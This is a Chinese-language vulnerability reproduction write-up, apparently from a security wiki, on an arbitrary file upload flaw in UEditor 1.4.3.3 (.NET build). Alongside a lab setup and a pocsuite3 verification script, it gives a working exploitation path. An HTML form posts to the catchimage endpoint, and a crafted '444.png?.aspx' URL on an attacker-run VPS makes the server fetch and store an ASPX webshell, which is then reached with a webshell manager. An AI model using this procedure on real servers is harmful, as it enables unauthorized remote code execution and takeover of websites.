漏洞介绍
Ueditor编辑器上传漏洞导致getshell
漏洞存在版本:1.4.3.3 Net版
环境搭建
IIS环境搭建+1.4.3.3net版源码
编译环境:java、npm、grunt、node.js
npm install
npm install -g grunt-cli
grunt --encode=utf8 --server=net
![图片[1]-Ueditor任意文件上传—tale-漏洞文库小世界-安全文库-NGC660 安全实验室](http://wiki.tidesec.com/uploads/202205/1a99c746b6d31df2c8ee1fa40e601fa2.jpg#id=VKbkV&originHeight=782&originWidth=1670&originalType=binary&ratio=1&status=done&style=none)
访问http://192.168.0.103/ueditor/index.html ,显示下面示例则部署成功。
![图片[2]-Ueditor任意文件上传—tale-漏洞文库小世界-安全文库-NGC660 安全实验室](http://wiki.tidesec.com/uploads/202205/ddad211509911e77f4176eaca8d5c03f.jpg#id=rP4NJ&originHeight=1712&originWidth=2230&originalType=binary&ratio=1&status=done&style=none)
验证漏洞
访问如下链接出现该提示证明漏洞存在
http://192.168.0.103/ueditor/net/controller.ashx?action=catchimage
![图片[3]-Ueditor任意文件上传—tale-漏洞文库小世界-安全文库-NGC660 安全实验室](http://wiki.tidesec.com/uploads/202205/95da80f82cd287807183a7334f656ae3.jpg#id=Fp6GH&originHeight=284&originWidth=1420&originalType=binary&ratio=1&status=done&style=none)
访问如下链接出现该提示证明.net环境运行正常
http://192.168.0.103/ueditor/net/controller.ashx?action=config
![图片[4]-Ueditor任意文件上传—tale-漏洞文库小世界-安全文库-NGC660 安全实验室](http://wiki.tidesec.com/uploads/202205/80e4cd3d3d6525941c392439b61d3e31.jpg#id=yMU6k&originHeight=754&originWidth=2960&originalType=binary&ratio=1&status=done&style=none)
pocsuite3 poc code:
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE
class DemoPOC(POCBase):
vulID = 'XXXX' # ssvid
version = '1.4.3.3'
author = ['tale']
vulDate = '2021-07-18'
createDate = '2021-07-18'
updateDate = '2021-07-18'
references = ['']
name = 'Ueditor任意文件上传'
appPowerLink = ''
appName = 'Ueditor任意文件上传'
appVersion = '1.4.3.3'
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''Ueditor任意文件上传'''
samples = []
install_requires = ['']
category = POC_CATEGORY.EXPLOITS.WEBAPP
def _verify(self):
result = {}
path = "/net/controller.ashx?action=catchimage"
r = requests.get(url = self.url+path)
if "没有指定抓取源" in r.text:
result['FileInfo'] = {}
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
漏洞复现
首先本地创建html文件,并将url地址修改为靶机ip,保存名命1.html。
<form action="http://192.168.0.103/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
然后在公网vps搭建临时web服务
python -m SimpleHTTPServer 8080
![图片[5]-Ueditor任意文件上传—tale-漏洞文库小世界-安全文库-NGC660 安全实验室](http://wiki.tidesec.com/uploads/202205/d0a170b40251e752b71e018fd880d85b.jpg#id=lnISJ&originHeight=688&originWidth=1710&originalType=binary&ratio=1&status=done&style=none)
本地打开1.html后,输入如下地址进行上传shell
http://ip:8080/444.png?.aspx
![图片[6]-Ueditor任意文件上传—tale-漏洞文库小世界-安全文库-NGC660 安全实验室](http://wiki.tidesec.com/uploads/202205/dda12750a2d32141c5c9cad29b695f8a.jpg#id=O0WMo&originHeight=250&originWidth=904&originalType=binary&ratio=1&status=done&style=none)
上传成功后,会返回如下结果
![图片[7]-Ueditor任意文件上传—tale-漏洞文库小世界-安全文库-NGC660 安全实验室](http://wiki.tidesec.com/uploads/202205/337b9f4f762a2bbf4c7c529eefb3b152.jpg#id=YwPxU&originHeight=294&originWidth=2586&originalType=binary&ratio=1&status=done&style=none)
使用webshell管理工具连接验证如下。
http://ip:8001/ueditor/net/upload/image/20210728/6376306592532325491434427.aspx ![图片[8]-Ueditor任意文件上传—tale-漏洞文库小世界-安全文库-NGC660 安全实验室](http://wiki.tidesec.com/uploads/202205/dc004aa61aaf4f0b567b0180c5d2adbd.jpg#id=t0Qix&originHeight=1232&originWidth=2040&originalType=binary&ratio=1&status=done&style=none)
参考链接
https://www.cnblogs.com/dslt/p/14903092.html https://www.cnblogs.com/hei-zi/p/13394764.html
请登录后查看回复内容